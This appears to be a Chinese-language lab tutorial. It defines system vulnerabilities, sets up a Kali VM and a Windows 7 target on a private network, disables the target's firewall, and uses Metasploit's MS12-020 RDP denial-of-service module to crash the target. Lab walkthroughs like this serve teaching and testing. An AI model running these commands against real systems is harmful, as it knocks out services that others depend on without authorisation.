简介:
系统漏洞是指应用软件或操作系统软件在逻辑设计上的缺陷或在编写时产生的错误。某个程序在设计时未被考虑周全,这个缺陷或错误将可能被不法分子或黑客利用,通过植入木马病毒等方式来攻击或控制整个计算机,从而窃取计算机中的重要资料和信息,甚至破坏系统。系统漏洞可对用户造成不良后果。漏洞被恶意用户利用,会造成信息泄露;黑客攻击网站即是利用网络服务器操作系统的漏洞,对用户操作造成如不明原因的死机和丢失文件等。
系统漏洞主要分为两种,一种是高危漏洞,另一种是功能性漏洞:
高危漏洞:系统核心和 Office 漏洞,这些漏洞允许远程执行代码,使得电脑有被入侵的危险
功能性漏洞:软件版本更新或给系统添加实用功能,用于解决普通的电脑问题,提升电脑性能
kili步骤:
1.设置Vmnet4网卡 网段为192.168.2.0
编辑——虚拟网络编辑器——添加网络——vnnet4——修改vmnet4—— IP地址为:192.168.2.0
2.设置kali系统的IP地址为192.168.2.2
a).取得root权限
sudo passwd root给root配置密码
sudo passwd root
b).设置IP地址
vim /etc/network/interfaces 修改网卡配置文件最后两行
vim /etc/network/interfaces
-
aut0 eth0
-
iface eth0 inet static
-
address 192.168.2.2
-
netmask 255.255.255.0
-
gateway 192.168.2.254
c).重启网卡
/etc/init.d/networking restart
d).重启电脑
reboot
e).查看IP地址
ifconfig
4).设置win 7的防火墙
控制面板——防火墙——关闭防火墙
6).打开kili实现win 7互通
kili:
ping 192.168.2.3
win 7:
ping 192.168.2.2
以上部分是为了接下来的漏洞攻击!
3.漏洞攻击
系统攻击概念图
1).设置攻击框架
msfconsole
2).搜索系统漏洞
search dos
3).查看ms 12-020系统漏洞
search ms 12-020找到系统漏洞的路径
search ms 12-020
4).使用系统漏洞进行攻击
use auxiliary/dos/windows/rdp/ms 12_020_maxchannelids 2012-03-16
set rhost 192.168.2.3
run